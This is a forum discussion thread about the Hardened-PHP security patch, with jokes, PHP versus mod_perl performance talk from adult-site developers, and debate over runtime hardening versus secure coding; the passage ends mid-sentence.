Hardened PHP

Frank Kreuzbach writes "Yesterday the Hardened-PHP Project has announced its existence on the PHP-general mailinglist. It is the first public patch for PHP which adds security hardening features. It is meant as a proactive approach to protect servers against known and unknown weaknesses within PHP scripts or the engine itself. It enforces restrictions on include statements, adds canary protection to allocated memory and other internal structures and protects against internal format string vulnerabilities. It has syslog support and logs every attack together with the originating ip."

Oops

[Doomrat]

I like how this story is positioned just above the one about WinZip's poor security.

Is your PHP hardened?

Or are you just glad to see me?

Just like Perl's tainted mode?

no body.

Re:Just like Perl's tainted mode?

no. actually quite different, since perl's tainted mode happens in the interpreter part of the engine while hardened php is compiled into the engine!

Re:Just like Perl's tainted mode?

> no. actually quite different, since perl's tainted mode happens in the interpreter part of
> the engine while hardened php is compiled into the engine!

It's nice to see that you PHP pantywaists still don't have the slightest clue what you're talking about.

Phew!

[Dark+Lord+Seth]

adds canary protection

Is that protection against canaries? Protection with Japanese kunf-fu canaries? Or protection for canaries? I mean, the kung-fu canaries have potential...

Re:Phew!

[hattig]

I assume this like how they used canaries to test for gas in mines? If the canary died, then it was dangerous to be in that area.

So from that, I assume that "canary protection" is actually running a kind of honeytrap for common PHP exploits, and if one is triggered ("dies") then it does some computery equivalent of ("lets get the fuck out of this mine").

This is all speculation based upon the name though.

Re:Phew!

My son, it would be unwise to refuse protection for your canary.

You wouldn't want any unfortunate 'accidents' to happen to the little guy.

-- a concerned Hawk and 'Legitimate Businessman'

Re:Phew!

[CTho9305]

It's a way to protect against buffer overflows. You put some known data on the stack, and before returning from each function call, make sure that data hasn't been changed. Most buffer overflow exploits work by overwriting part fo the stack, and canary protection will detect that the stack has been changed, so the exploit code will not run.

Re:Phew!

> You wouldn't want any unfortunate 'accidents' to
> happen to the little guy.
>
> -- a concerned Hawk and 'Legitimate Businessman'

Suffering suckatash. No-one would pay a mafia hawk to guard a canary.

You need someone objective. I'd be willing to do it for free.

-- Sylvester the Cat

Re:Phew!

I keep a canary in my bathroom for that very reason.

Re:Phew!

[JDWTopGuy]

Canaries are a relatively small threat, it's the Kung-Fu Shrimp you have to watch for.

Re:Phew!

[TheBoostedBrain]

I don't know kunf-fu, but kung fu is chinese. Maybe you mean kung foo bar?

Re:Phew!

[archeopterix]

Is that protection against canaries? Protection with Japanese kunf-fu canaries? Or protection for canaries? I mean, the kung-fu canaries have potential...

What do you mean, african or european canaries?

Re:Phew!

Mod parent up! A monty python quote shall not go unrewarded!

Already in use

[Noose+For+A+Neck]

I do some development and site administration work for a high traffic porn site, and I can tell you that we've been using Hardened PHP since before the project announcement (I'm friends with one of the developers). It works OK so far, but the server starts to get worn out after a while, after being particularly abused by a day's peak traffic.

Re:Already in use

[Espectr0]

do some development and site administration work for a high traffic porn site, and I can tell you that we've been using Hardened PHP

I can see it now. Hardened PHP is the new "manly-patch" for 2004. Gets you "hard"!

Re:Already in use

[Ieshan]

Two Questions:

1) I've heard some complaints about PHP on "high traffic" sites, is it easier on you guys because you're primarily serving static pages? I mean, I'm not a big porn freak, but it seems to me that most porn sites wouldn't be overly dynamic, since most of the content doesn't change once it's posted. Maybe some of the userauth stuff is PHP based, and maybe a site forum, but I don't really see what else would need to be supar-dynamic.

2) Maybe this seems like a naive post - and maybe it's offtopic, mods, have your way - but with all the free porn that's constantly bombarding my mailbox and my computer screen with flashing messages, how do you all make money?

I mean, what's "high traffic"? 20 paying users? Where *are* all these people that don't get the same spams for free porn that I do?

Maybe the free porn isn't actually free, and that's why people pay.

Re:Already in use

[Tablizer]

porn site....server starts to get worn out after a while, after being particularly abused by a day's peak traffic.

Dontcha mean "peek" traffic :-)

Re:Already in use

Maybe the free porn isn't actually free, and that's why people pay.

Quite correct, usually you only get some preview pics but quite soon you're asked for your credit card number. Try it out yourself once (preferably not with MS IE;)

Re:Already in use

I can't believe that was modded interesting when it was an obvious attempt at humour.

Re:Already in use

[dourk]

Dontcha mean "peek" traffic

And what protection do you use for the hardened 'poke' traffic?

Re:Already in use

[realdpk]

1) PHP is not all that great for high traffic sites. It's lightyears better than mod_perl - in my experience - but it's still very much worse than static pages. One major problem is people tend to make a site overly dynamic, or don't cache frequently run queries/functions. Zend Optimizer can help, as can the other Zend products, but only to a point.

2) Try thousands of users (it's not uncommon). Lots of free porn is out there, but the goal is to tease the surfer into pulling out a credit card. There are some niche sites that offer stuff nobody else does (for free) that can do quite well. What's hot now is live videocam chatting. I don't think you can get that for free (at least, not with the same quality selection)

Re:Already in use

[a1cypher]

Actually, I am a PHP developer for some major porn sites. The sites that I work with, however, arent the end user sites that people pay to view, I work with the sites where porn webmasters go to buy their content.

Surprisingly, it has to be fairly dynamic. Most of the work that my software has to do is in posting the content for the first time. You upload a zip, and the software will extract the zip taking the images makes thumbs and full sized samples with embedded watermarks. From this point on, the software is basically an advanced shopping cart with some extra features like the ability to order individual images out of a particular zip, and instant download.

The sites that I have setup are surprisingly popular, and within the past year and a half, the sites I work with have sold closs to half a million dollars worth of porn. That may not seem much to a big business tycoon, but it is when theres only a handfull of people making the profit.

I dont know how well the end user sales are however. I like this hardened php stuff and I think it has great potential. I am waiting for them to come out with a PHP5 version, and then I will jump right on it because all of my newer projects are going to be in php5.

Re:Already in use

[toastyman]

1) We've got no problem with PHP on a pretty high traffic porn site. Turck_mmcache helps quite a bit by caching the pseudo-compiled bytecode of each script, so it's pretty blazing.

Basically every page is dynamically generated, even the images go through a PHP script to make sure the right people are seeing the right images.

We honestly have a bigger problem with the SQL server keeping up than PHP consuming too much CPU. The site listed in my home page URL here runs on 3 servers, one for MySQL, one for most PHP scripts, and one to serve all the images. The two httpd servers handle about 1200 requests per second, and the loads are pretty low. 95% of those requests are PHP scripts.

2) For the site I'm talking about there, we've got anywhere from 1000 to 5000 people browsing the site at once. Another site I admin(very NSFW) gets much more traffic than that, and a lot of those visitors are downloading 5-200MB movies for free. There we have two thttpd servers handling most of the static files (videos and images). At times there we're in the more-than OC-12 levels of bandwidth, and they handle the load just fine.

How do we make money? Some of our sites are subscription based, and we try to have content that you can't get anywhere else. We try to drive the community aspect of our sites, and try not to just be "another generic porn site".

The first site lets anyone browse for free as much as they want, you just get access to more content if you pay. You also get to talk to the "performers" and a few other perks. The second site I mentioned is all free, it's supported by ads though.

(trying not to make this spam, just a bit of insight into how porn on the internet actually works. And no, I'm not Stile.)

Re:Already in use

[abulafia]

Weird. I do high-volume sites for a living, and mod_perl rocks. I sometimes fall back to coding something in C when it is called millions of times a day, but in general, mod_perl makes getting close to the iron really easy.

shrugs.

Hell, people probably can write fast software in PHP... I can't stand the language, myself, so I've never bothered to learn optimization tricks. Mod_perl kicks ass... as Slashdot knows, not to mention Amazon...

Can a PHP devotee who also knows web development from a mod_perl standpoint explain why you like PHP so much? I'm honestly curious. I've modified other people's apps, and find the language both cumbersome to use for non-trivial things and overly low level, at the same time.

Re:Already in use

[Karamchand]

Unfortunately mmcache isn't developed anymore, isn't it? :-/

Re:Already in use

[destiney]

What else does it need to do? This version has been working pretty darn good for me for a long time, on multiple versions of PHP even.

Re:Already in use

[HuckleCom]

Hardened php on a Porn Site If I was writing PHP for a porn site my code would be hardened too ;)

Re:Already in use

[kensai]

So do you use Fluffer PHP as an addon to Hardened PHP in the porn industry?

Re:Already in use

Online porn is a huge industry. Think about sites like Hustler.com where you can read backissues of the magazine over the last few years and new issues when they appear on newsstands. They also have most of their full length dvds available to users. That's all of Hustler's Barely Legal videos as well as all their other stuff. Thats a huge amount of high quality content that is difficult to find from free sources.

Then think about sites like ten.com where you can watch literally thousands of full length porn dvds. Thats hundreds of gigabytes of high quality content. The people that run this website get the movies from the cable and satellite networks that they own (exxxtacy, true blue, ten, ten clips etc...). This is the stuff that cable viewers pay $10 a movie to watch on Pay-per-view, so you can see how $20 a month to watch all the movies they want is an attractive price.

Then think about all the niche stuff that is hard to find from free sources. E.g. Max Hardcore, Bukkake, watersports etc. and you will begin to understand how these guys make money. Niches sites are usually more expensive too ($30 -$40 a month). With just 5000 users they make $150,000 - $200,000 a month gross. 5000 perverts aren't that hard to find when you consider that these websites attract users from all over the world.

What the user pays for is access to large amount of high quality content (e.g. huge library of movies), or niche content. Searching for porn on free sites sucks because it is all disorganized. E.g. 15 photos from site number 1, 12 photos from site number 2; and usually the movies from free sites are too short or low quality. Getting free porn from P2P (kazaa, overnet) is another option but the selection is actually pretty small and finding what you are looking for is not an easy task.

This is how online pay porn sites make money. ;)

Re:Already in use

My job involves looking at naked chicks all day. Why doesn't yours?

Maybe because I still have a sex life at night?

grin! :-)

Re:Already in use

Can't comment on the PHP too much but I agree with you totally regarding mod_perl. You need a hefty dollop of memory, but mod_perl with the 1.3 Apache servers is pretty fast and robust (and has been for a few years now).

We used it with embperl for a high traffic site in the UK - pages were highly dynamic, and in almost every case our bottlenecks were caused by inefficient SQL calls to the Oracle backend.

I guess PHP has an easier learning curve than Perl - but unless PHP can give me the functionality of DBI, Mason (or embperl, or TT, or AxKit or ....), DateTime and all the other lovely CPAN modules - and has some concept of the dangers of using tainted data, I'll stick to the much maligned (and much misunderstood) brainchild of Larry Wall - thanks all the same :)

Re:Already in use

[nemesisj]

I'm not extremely familiar with mod_perl, but I do lots of work in PHP.

The reasons I like PHP better than perl for web development is the fact that you can escape in and out of execution (yes, this can be and is often abused) and I like how PHP wraps some of the more unreadable aspects of perl (like extracting arguments, etc) and has nice session support.

Also, PHP seems to have a lot of standard web stuff rolled in by default. I know that you can configure perl to be whatever you want it to be, but back before I had access to my own servers whose environment I could control, this mattered a bit more.

Anyway, just my two cents - it really comes down to personal preference between the two in my opinion - lots of the major disctinctions have gone away in the last couple of years.

Re:Already in use

[BusDriver]

Turck MMCache dev stopped since the lead dev was taken in by Zend. That doesn't mean development has stopped though! New people have taken it over and are slowly coding new stuff up!

Re:Already in use

[onlyjoking]

Case in point. I started with Perl, learnt mod_perl then had to switch to PHP for most of my client work because most of them were using hosts which didn't provide mod_perl. This is the biggest drawback with Perl. Great language but brain-dead in the marketing department. Perl has lost ground in the web development sphere because it depends on mod_perl to compete with mod_php for performance. Perl templating engines (Mason, Apache Template, Embperl) allow you to do what PHP can do (and much more) but you're saddled with finding a host who will "risk" offering mod_perl. The authors of O'Reilly's "Practical mod_perl" even went so far as to advise explicitly against offering mod_perl in a shared hosting environment. Hence PHP replaces Perl in shared hosting environments.

Mention this on comp.lang.perl.misc and you get flamed for referring to Perl as a web developmnent tool. Well, if the Perl community only sees Perl as a tool for large web projects then so be it but they're making a big mistake. There should be a decent Perl templating engine which can run as an Apache module without exposing the Apache API, so that it would just do the one job well. Until this happens PHP will simply wipe Perl off the map in shared hosting environments.

Hopefully Perl 6//Parrot/Ponie will come up with something to break the inertia as bog-standard Perl CGI is irrelevant these days. Hell, many hosts don't even allow you free reign with installing CPAN modules.

Re:Already in use

[billysara]

Mine does too - yay for us :-)

I use PHP all the time. I know perl/mod-perl too but it doesn't have the install-base that php does - especially selling to people on shared hosting packages..

It's also kind of unusual to find cheapo shared hosting sites (on the adult side of things) who will let you run cron jobs or the like. Understandably :-)

Re:Already in use

[TheRaven64]

The authors of O'Reilly's "Practical mod_perl" even went so far as to advise explicitly against offering mod_perl in a shared hosting environment. Hence PHP replaces Perl in shared hosting environments.

I'd be interested to know how this is done. As far as I have been able to tell from installing PHP, playing with it, and skimming the documentation there is no easy way of preventing and PHP pages run by mod_php being run as the Apache user. For me, this is not a problem since no one else uses my server. It seems the only way to run PHP pages as the user who owns them is to use the CGI version of PHP which has the disadvantage of loading a 4MB binary every time a PHP page is called.

Re:Already in use

[Lando]

Speaking as someone who is familiar with both mod-perl and php and still does primary work in php, perhaps I can enlighten you.

The fact of the matter is that before mod-perl, getting perl to run as a scripting language required spawning perl processes for each request made to the server. This causes significant problems. PHP as a compiled in resource could be handled by the apache children themselves and did not suck up extra resources.

Now, that's not the case with perl any longer, but with any system that you have significant ammounts of time and other investments in, it's kinda hard to drop current production and switch back to perl.

Currently, since the new core for perl has been underway for a while and that will likely require a reworking of the code the decision has been made to hold off so that we don't have to rework the engine twice.

Re:Already in use

[Yaa+101]

Perl was invented to scratch a itch on the commandline, PHP is purely invented for apache and this shows... The problem is not PHP being "slow", the problem is wrongly usage of the database, mostly mysql. Some well known PHP programs use more than 30 queries each go, you can understand that of course a high volume site is out of the question... Further there is also the question with both Perl and PHP, that is a smooth configured Apache that can fork and prefork a number instances from itself to serve connections. Mainly PHP is a C like interperter on steroids... The language is very problem solving by nature and very efficient in that it takes a handfull of statements to solve a complicated matter... I think Perl developers see the same with Perl, my impression is that the same solutions take less code in PHP compared to Perl, but the is my private impression... The largest power of PHP is intuitivity, most constructs you think off work in one or 2 go's while in other Languages often you are buried to death with error messges... And not to forget, instant gratification, you can do more than 1000 runs in a hour when developing...

Re:Already in use

Projects like Mason or Embperl accomplish that same functionality of including excutable code inside special tags, e.g. "" or "<%...%>", but you also harness all the power of mod_perl at the same time.

Mason and Embperl are complete systems built on top of mod_perl, so it's a whole new architecture separate from regular mod_perl.

Re:Already in use

I think the shared hosting environment problems is solved by Apache2, solving all the problems with php and mod_perl relating to running servers as different users.

Anyone care to elaborate on the point I'm not bothering to finish?

Re:Already in use

[JDWTopGuy]

I call well-done troll/joke on this one. "Hardened PHP", "server gets worn out after the day's abuse"... Maybe it's just me.

Re:Already in use

so now I know what PHP REALLY means... Porn Home Page Tools!

Re:Already in use

[yarbo]

hey! How's it going?

Re:Already in use

[onlyjoking]

Regardless of Apache versions mod_perl is still a much bigger risk because it exposes the Apache API. By contrast mod_php exists, it seems, merely to give PHP its speed boost. This is what Perl needs.

Re:Already in use

[onlyjoking]

... getting perl to run as a scripting language required spawning perl processes for each request made to the server .... Now, that's not the case with perl any longer,

Are you referring to the current Perl 5.8 or the future Perl 6? As far as I'm aware Perl CGI, ie. without mod_,is still the dog it always was, which is why PHP has taken root so quickly. This would never have happened if something like FastCGI or PersistentPerl had been marketed better along with a CPAN Bundle to handle web development templating.

Re:Already in use

"We try to drive the community aspect of our sites"

Cough, like COHF, cough.

Must claw out eyes, if you're responsible for that abdomination I'll do yours too.

Re:Already in use

[billcopc]

The hard part in pay-for-porn is authentication. Not hard to implement, but hard on the server. If you have 40-50 simultaneous users clicking on the "Next" arrow to surf through your photo galleries, each time a pic is loaded you need to confirm the user's login. This means either grepping the htpasswd file, or running a database lookup.

I can serve 1200 static pages per second, but if there is an SQL query or even just moderate PHP processing that number drops down to 150-200 hits-per-second. It's not dragging the server to its knees, but it does cause noticeable lag in the 400-500ms area. If you've got 20 thumbnails on the page then you're looking at roughly 10 seconds before everything is loaded, no matter how much bandwidth you have.

To work around such things, I've been playing with a shared-memory caching system. I keep the valid user list in shm, then have the perl/php use that instead of hitting the database all the time, since login data only changes once or twice a day. It is trivial to trigger a shm-update whenever the billing company calls up their cgi to alter the user list. I just wish this kind of functionality existed right inside apache because it would sure help several thousand other webmasters :)

Re:Already in use

[joshmccormack]

Most hosting environments I've seen with PHP running, it's a CGI, not the mod version.

PHP is really easy to write poorly. The only reason this doesn't do horrible things more often is servers are powerful enough to handle the amount of traffic that hits them when they're funning poorly written PHP code.

You can certainly find poorly written Perl, or whatever other language you like, but I think it's more common to find people who really care about granular details, security, coding style, etc. in other languages. Too many people have backed into PHP, just wanting something that works, not really caring about all the particulars.

Re:Already in use

[ahodgson]

It'll need to be updated to work with PHP 5, for one.

We use it, and it rocks, but its future is in doubt.

Re:Already in use

[ahodgson]

For those others reading this, Memcached rocks as a general-purpose distributed memory cache.

Re:Already in use

[justMichael]

There are two options that I know of, there may be others.

For 1.3 you can use mod_become, but it looks a little scary to me.

For 2.x you can use mod_suid2

Re:Already in use

[BusDriver]

There is a 2.4.7-dev version from CVS that works quite well with PHP5!

I don't think it's future is in doubt at all, just that the insane pace it was developed at has slowed a little bit.

Re:Already in use

[Lando]

Actually I was refering to the time before mod_perl came out. Anytime you have to spawn a process it's going to eat into your time... That's why I switched to php from perl in the first place and now I'm too entrenched to go back without a lot of work. If I did, or when I do go back it will be to mod_perl.

Re:Already in use

[Lando]

As far as persistant perl, there was a mechanism for calling a perl server that stayed active, but it still envolved starting a cgi program and caused memory issues as it forked the current process to spawn the cgi in the first place... Quite a bit of work around to get the system to preform properly so PHP was faster and easier... Leaning more to the later than the former.

Re:Already in use

[ahodgson]

Cool. Thanks for the update :)

Soft PHP

[aenters]

It better not ever encourage Safe Mode as a security feature. I perfer running in Dangerous Mode.

Call Me Crazy But....

[CptSparrow]

From the site:

to protect your servers on the one hand against a number of well known problems in hastily written PHP scripts

Wouldn't a better defense be to simply write good code?

Re:Call Me Crazy But....

[Karamchand]

Think about web space providers, usually they can't really control which scripts are executed on their servers by the customers. PHP's safe mode is cute already, but this can be an additional layer of security.

Re:Call Me Crazy But....

Tell that to the FUCKING NOOBS...
mbnnmc

Re:Call Me Crazy But....

[rollingcalf]

"Wouldn't a better defense be to simply write good code?"

Yes. But that is something that over 50% of today's coders aren't capable of.

Re:Call Me Crazy But....

[The_Mystic_For_Real]

Of course the best way to secure anything is to take the time to write good code, but the reality is that many pages have to be put together in a limited amount of time by people with very little experience. I think that it is a good thing to see people in the security community keeping this in mind.

Re:Call Me Crazy But....

[ninji]

It's true, but even the most widely used professional php apps are coded by amatures, as php's so easy anyone can write anything in it... After I read a study in scarlet (the php security doc, not the holmes book) I realized every applicaiton I and anyone I knew had written until that point was easily exploited in many ways, I also went on to exploit all my friends websites to prove such to them.... I now consider myself one of the few good conders who write solid code not exploitable by phps common coded flaws, but the most popular login systems for website etc commonly still arn't even aware....

is this just an excuse to write sloppy code

[burritoKing]

it's certainly a step in the right direction, however as most vulnerabilitiesseem to come about as a result of poorly written code shouldn't the community be trying to educate newer (and some more experienced) PHP users.

Re:is this just an excuse to write sloppy code

[dooguls]

I couldn't agree more with this poster. I think education of programmers in our Computer science educational instutiutions is lacking severly in teaching new programers about what dangers poorly written code can result in. I did a semester research project on the subject for my masters. (http://www.csee.umbc.edu/~cress1/cmsc791.html) All the educators I included in my project had very little if any clue about secure programming issues and after being presented with teaching alternatives were interested to include them in their curriculum. Does anyone else have any experiece where their professors hammered home the point that insecure and poorly written code can have catestrophic results?

Re:is this just an excuse to write sloppy code

[Xenographic]

Uhh, well, they recited a list of disasters caused by bad code at one point, I think.

But the lecture didn't exactly give us a lot of help in actually doing defensive programming so as to actually *avoid* those errors...

Re:is this just an excuse to write sloppy code

[Crayon+Kid]

Besides the dangers of bad code in general, PHP is particularly dangerous, with it's very flexible and network enabled features. It only gets worse because it is (apparently) so easy to learn and use and it makes everybody feel like a God of website making in no time flat. [Insert boss saying "hey, secretaries could write PHP without a problem" here].

The solution would be a very restrictive safe mode, which would freaking MAKE people watch what code they're writing and give up incredibly stupid and at the same time tricky stuff like using variables with globals enabled without any kind of previous cleaning or filtering. And the second half of the solution would be to throw out on their ass all the self-proclaimed PHP programmers who pull stupid stuff like this.

The first part won't happen because hosting services can't afford to break all the sites using globals and so on. The second half may happen, I dunno.

Meanwhile, hardened PHP won't mean much, I'm afraid. If a guy doesn't know enough to use an automated filtering class on his $_GET[] he won't know he needs Hardened PHP either, because he lacks severely where PHP security is concerned. You can lead a horse to water but you can't make it drink, right?

Re:is this just an excuse to write sloppy code

[mumblestheclown]

i couldn't disagree more.

as the japanese car makers discovered (or at least the idea came to prominence) in the 1950s, ANYBODY (even people with 93 PhDs) who assembles something makes mistakes occasionally. the trick is to limit the number of modalities that allow for mistakes. a person who is asked to make a wheel fairing in three minutes using simple hand tools will make far more mistakes than one who has a dedicted stamping machine.

in fact, the japanese cars excelled in quality, worker satisfaction, and in the competitive marketplace for many years in large part that their idea that a) errors are natural stochastic processes b) the rate of errors in an any process is more determined by the design of the process than some inherent quality of the worker and therefore c) when a mistake is made, analyze the process, don't blame the worker as this will lead to d) continuous improvement and also empower workers to speak up.

even the most experienced PhP programmer can make an error. education helps, but fixing the system is a better idea.

Re:is this just an excuse to write sloppy code

[burritoKing]

a person who is asked to make a wheel fairing in three minutes using simple hand tools will make far more mistakes than one who has a dedicted stamping machine. Not really sure I understand. Surely a better way would be to train the person, rather than build in safeguards just in case they produce something that is faulty ( a likely event) even the most experienced PhP programmer can make an error. education helps, but fixing the system is a better idea. Which is why education is so important, let's move away from syntax/coding and look at testing/evaluation. Critical points in your system, for example user input, must be throughly tested. Sections of your code that could produce an error must be allowed to recover if this happens. Does it do something it shouldn't...the list goes on.

Re:is this just an excuse to write sloppy code

[Glendale2x]

Meanwhile, hardened PHP won't mean much, I'm afraid. If a guy doesn't know enough to use an automated filtering class on his $_GET[] he won't know he needs Hardened PHP either, because he lacks severely where PHP security is concerned. You can lead a horse to water but you can't make it drink, right?

How 'bout a link to or example of (a good) one?

Re:is this just an excuse to write sloppy code

[wantedman]

Not really sure I understand. Surely a better way would be to train the person, rather than build in safeguards just in case they produce something that is faulty ( a likely event)

Ok, there's a difference between cutting a board with a handsaw and cutting something with a electric powered table saw. No matter how much training I have, a table saw will cut a board faster and straigher than a hand saw.

Which is why education is so important, let's move away from syntax/coding and look at testing/evaluation.
Ok, let's look at testing/evaluation. The truth is, must exploits happen because a hax0r finds a way to interact with a program that the programmer wasn't thinking about.

How do you design a test that interacts with a program that the programmer wasn't thinking about? How do you design a test that interacts with a program where another program causes the error, such as the COM / ActiveX Exploit.

Education is fine, but there is a time when it's not enough. You have to accept that there will be situations where people don't think. If you can design your tools to protect yourself around those, then your company will be better off.

Re:is this just an excuse to write sloppy code

[Kiryat+Malachi]

It's more than that, though. Mechanical and electrical engineers (usually) learn a concept called design for manufacturability, which encompasses things like designing such that when you try to fit tab A into slot B, it is physically impossible to fit them in the wrong way. For the non-engineer, good examples of this are keyed ATA-IDE connectors; the old ones weren't keyed, and you had to check the cable for the red wire and the board for the 1 pin, to make sure you had it in right. Now you just line the slot with the tab and its correct. That's DFM, and the idea is that you physically CANNOT fuck it up, making a 75 IQ and a 150 IQ functionally equivalent.

Its all about the process, and very little about the worker, if you designed the process right. Similarly, if Hardened PHP can make it so that exploitable code simply can't run, you've cut down your probability of breach whether you have great programmers or George W. writing your code.

Re:is this just an excuse to write sloppy code

[joshmccormack]

http://us2.php.net/manual/en/security.variables.ph p

Here's the intro:

"User Submitted Data

The greatest weakness in many PHP programs is not inherent in the language itself, but merely an issue of code not being written with security in mind. For this reason, you should always take the time to consider the implications of a given piece of code, to ascertain the possible damage if an unexpected variable is submitted to it."

Re:is this just an excuse to write sloppy code

[ahdeoz]

Japanese cars were better than American cars in the 1980s because their factories were built in the 1950s to 1970s and the american factories were built in the 1920s to 1940s

Re:is this just an excuse to write sloppy code

[burritoKing]

I do agree with you, my original point was simply that we shouldnt soley rely on Hardened PHP, while it is a move forward, it still is no substitute for good practice.

Re:is this just an excuse to write sloppy code

[Kiryat+Malachi]

Extensive work in the manufacturing industry has shown that in fact, it is far better than good practice. It works, while trying to train all your workers to work perfectly does not.

When you can trust the process, you don't need to be able to trust the worker anywhere near as far. Things like Hardened PHP, NX-protection, etc., are not only a substitute for good practice, but eventually software circles will figure out they are in fact more important than good practice.

That said, the two together are still better than either one seperately.

Laziness

[kevmo]

From what I can see this project doesn't do much against protect lazy coders. The features listed are easily protected against by writing non-sloppy code.

I'm not sure that this project is a good thing, as if someone gets used to it and switches to a server without it they might be in trouble.

Re:Laziness

[HeghmoH]

This is a common theme, the "Security problems only occur because of lazy/sloppy/stupid coders, and the solution is to become better coders" theme.

The problem is that it's complete BS. Even the most wizardly coder will make mistakes. The only way to be secure is to have lots of code reviews, and then things still get through; look at holes in SSH or Apache. Tools like this certainly don't hurt, and they might just help. "Don't make mistakes" is not an option.

Re:Laziness

Well, you see there's a problem with your view and I think most programmers would agree they'd rather have hardened software than "better code" once presented with the alternative. You see, but "better code" you mean the code itself must compensate for security flaws such as type checking, bounds checking, etc. This turns 5 lines of straight-forward code into 100 lines of checking. This then must be duplicated or made agreeable to other code. You see how this will quickly convolute even the simplest programs. The solution is simply to get rid of the problem that requires the "better code" workaround to begin with.

While code that does all the heavy and light lifting on its own might seem fundamentally "better" than one that is "lazy" and relies on underlying mechanisms, I invite you to try and maintain 100,000 lines of "better" code that catches all gotchas and then try out a more manageable 20,000 lines of "lazy" code that is closer to the core algorithms and functionality.

Re:Laziness

The only way to be secure is to have lots of code reviews, and then things still get through; look at holes in SSH or Apache.

The big assumptions with code reviews:

a) the reviewer knows where the weak points are in the language/system

b) everyone agrees on the coding methodology

(a) is typically the big problem

Proactive?

proactive approach to protect servers against known and unknown weaknesses

If it is trying to cover up known weaknesses, wouldn't that make it reactive? Proactive would have been if PHP would have been designed with security in mind.

Bad Coding = Security Holes

[wellard1981]

I don't think the PHP engine is to blame, it's more of an issue with the PHP script developers to make sure they plug all the holes -- sure that's not always possible, however take PHPNuke as an example of poor PHP scripting, SQL injects are possible though a number of the modules. You have to add a high number of 3rd party patches to make the thing secure.

This Hardened PHP is just hand holding the developer into a false sence of security.

Re:Bad Coding = Security Holes

[Rui+Lopes]

Why protected at an upper level, if you can protect at a lower level? It's more robust to enforce security at a lower level than to rely on good programming practices!

Re:Bad Coding = Security Holes

[chegosaurus]

My PHP site is on a shared host. I do my level best to write secure code, but it's very possible the people who share my server don't. The server gets exploited through one of those, my site gets rmed or defaced, and suddenly I don't look so clever.

It's so easy to write bad code in PHP that half the world is doing it. Anything that helps ISPs protect users from the shortcomings of their peers has to be good news.

Re:Bad Coding = Security Holes

You might have a point if we were talking about C/C++.

However, "Personal Home Page" is designed for newbie/non-professional programmers. Bad Coding is virtually certain to happen. That's wny many of the insecure design choices in PHP are so puzzling.

Re:Bad Coding = Security Holes

[digitallystoned]

How is this 'hardened PHP' going to be any more secure than just PHP? I mean, yes, I can see where it has a few extra checks and built-in features that just basically transfers a few security bugs in other apps to the compiler and out of the script, but will this cause new programmers to just omit problems of the past out of their scripts?? I'm not saying that this isnt a good idea, but I just can see scripters leaving some variable checks out of the script and still leaving it vulnerable under the new 'hPHP'... Just a thought..

Re:Bad Coding = Security Holes

[julesh]

My PHP site is on a shared host. I do my level best to write secure code, but it's very possible the people who share my server don't. The server gets exploited through one of those, my site gets rmed or defaced, and suddenly I don't look so clever.

There are plenty of shared hosts that provide server processes running under separate UIDs, chrooted services, etc. which mean that as well as exploting a PHP script hole, the attacker would have to break the OS kernel protection as well in order to get at your site.

I suggest you change to one of those.

How about fixing safe mode instead?

[moeffju]

Wouldn't it be a lot more useful if they found an ingenious way to have PHP scripts run properly in a suexec environment, so we can finally get rid of safe_mode and open_basedir everywhere?

Not that this is not nice; every language should have internal hack/bug protections. But a proper security model would do more, no?

Re:How about fixing safe mode instead?

Well, check out suPHP. It looks interesting. I am curious if anyone is using this on some high traffic website.

PHP security all relies on the coder

[bigberk]

It's all about how the coder writes his/her software, same with C, or Java, or anything else. I am directly aware of several breakins using PHP, and none of them used buffer overflows or anything so low level.

The most interesting one I saw used a programming flaw (note: not PHP's fault) to execute arbitrary commands to get the web server to download, compile, and execute a telnetd-like program for remote logins. Once the attacker had gained access via user nobody, they ran one of several trivial Linux local root exploits to get root. Don't kid yourself, Linux ain't all that secure.

Re:PHP security all relies on the coder

[Decaff]

It's all about how the coder writes his/her software, same with C, or Java, or anything else.

Java has SecurityManagers, so its not the same as with C or anything else. Its easy to protect against dumb coding.

Re:PHP security all relies on the coder

[MBAFK]

Once the attacker had gained access via user nobody, they ran one of several trivial Linux local root exploits to get root. Don't kid yourself, Linux ain't all that secure.

There was heated debate on a LUG mailing list a few weeks ago where a couple of people were essentially taking the piss out of some users who were diligently updating their kernels to fix local root vulnerabilities. They argued that if you are the only user on the machine how is anyone going to break in?

You can see the obvious point that I'm making - security should be layered.

Re:PHP security all relies on the coder

[felix9x]

Sounds like a sloppy system administration. A hardened Linux system (thats being maintained) should not be susceptable to trivial local root exploits.

This seems redundant to me

[unterderbrucke]

I'm a administrator for a rather large PHP site, and most of these features have already been implemented by other third parties. The fact these people are implementing the same features used in open source projects makes me wary of exactly how original their code is.

Re:This seems redundant to me

[CableModemSniper]

You do realize that the hardened PHP code is open right? Or was it too challenging to go the website and click download?

Re:This seems redundant to me

[capica]

What other patches and projects? I am interested in hardening it, and any info (URLs) would be helpful...
Thank you.

Re:This seems redundant to me

Maybe you should read the documentation. The only 3rd party protection that makes this patch kinda redundant is PAX.

Re:Anyone else giggling?

[kunudo]

Nope.

This is a Good Thing(R)

Well believe it or not, in a lot of cases, PHP code just cannot be trusted. There may be vulnerabilities outside of PHP that can allow an attacker to place their own scripts on the server. When for instance, the ftp access password is cracked, someone can do just about anything if php hasn't been secured. With extra security measures, your site might be lost, but the server won't be compromised any further than that. For instance, on my server, functions like system and popen are disabled.

Besides, if everyone writed only really nice code, why would there be RSBAC and PaX?
Trust is a weakness.

Re:This is a Good Thing(R)

this is why if you're smart you configure your webserver to auto-prepend a script which does some basic security checks, things like validating sessions etc. plus you can set it up to know the names of what scripts can run when and where, and then create some code that checks what script was called and what variables were passed to it, and if it fails the checks for that script it wipes out all user variables, terminates script execution and logs an error.

I believe it would even be possible to get an md5 of the script that is being executed and compare it to a stored value.

These are all the kinds of things I'm working on for an application I'm developing. But the whole point is to create layers (onions have layers, ogres have layers, get it?) esp. those that force the entire enviroment to verify what it is running before it even runs it. Basically write things so that they can't run unless they are supposed to run then and there in that situation.

Say you have a program, and a certain page is opened, from that page you have possible actions. You need to create something separate which knows what actions can run from that page, and if something else is told to run that shouldn't be run. Or any other sort of thing similar to that, it terminates with a "friendly" error message and LOGS what happened, where it came from, the user name, etc.

And while I'm at it, other things to consider is if you use a cookie to allow a user to return to the site later and be logged in and have thier cart or whatever restored, you should:

